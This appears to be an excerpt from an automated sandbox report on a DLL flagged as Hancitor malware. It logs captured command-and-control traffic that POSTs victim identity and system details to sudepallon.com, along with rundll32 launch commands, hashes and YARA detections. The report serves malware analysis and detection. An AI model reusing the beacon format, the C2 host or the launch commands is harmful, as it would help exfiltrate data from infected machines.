                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Timestamp: Jul 9, 2021 03:12:02.261106014 CEST | kBytes transferred: 5500 | Direction: IN
                              Data: HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 59 51 4a 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cYQJBARRABw==0


                              Session ID: 99 | Source IP: 192.168.2.3 | Source Port: 49826 | Destination IP: 77.222.42.67 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp: Jul 9, 2021 03:12:02.203263998 CEST | kBytes transferred: 5500 | Direction: OUT
                              Data: POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Timestamp: Jul 9, 2021 03:12:02.269040108 CEST | kBytes transferred: 5500 | Direction: IN
                              Data: HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:03 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 41 5a 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVAZEARRABw==0


                              Code Manipulations

                              Statistics

                              Behavior

                              System Behavior

                              General

                              Start time:03:10:01
                              Start date:09/07/2021
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe 'C:\Users\user\Desktop\niberius.dll'
                              Imagebase:0x1200000
                              File size:116736 bytes
                              MD5 hash:542795ADF7CC08EFCF675D65310596E8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000000.00000003.371171215.0000000001500000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Start time:03:10:01
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
                              Imagebase:0xbd0000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:03:10:01
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\niberius.dll,Exercisefound
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000002.00000003.339351013.0000000000660000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Start time:03:10:02
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe 'C:\Users\user\Desktop\niberius.dll',#1
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000003.00000002.488244690.0000000002E54000.00000002.00020000.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Start time:03:10:06
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\niberius.dll,Forwardlow
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000004.00000003.355295800.0000000000630000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Start time:03:10:10
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\niberius.dll,More
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000005.00000003.363092172.00000000004F0000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Start time:03:10:15
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\niberius.dll,Overhuge
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000006.00000003.368759303.0000000004F40000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Start time:03:11:14
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\System32\svchost.exe
                              Imagebase:0x990000
                              File size:44520 bytes
                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:03:11:17
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe 'C:\Users\user\Desktop\niberius.dll',ONOQWPYIEIR
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 0000000E.00000002.488456292.0000000004434000.00000002.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 0000000E.00000003.441877348.0000000000DD0000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Start time:03:11:18
                              Start date:09/07/2021
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe 'C:\Users\user\Desktop\niberius.dll',VKHFWVNHPFTVX
                              Imagebase:0xe30000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 0000000F.00000002.488676401.0000000004BA4000.00000002.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 0000000F.00000003.443699128.0000000004CA0000.00000040.00000001.sdmp, Author: Joe Security
                              Reputation:high

                              Disassembly

                              Code Analysis
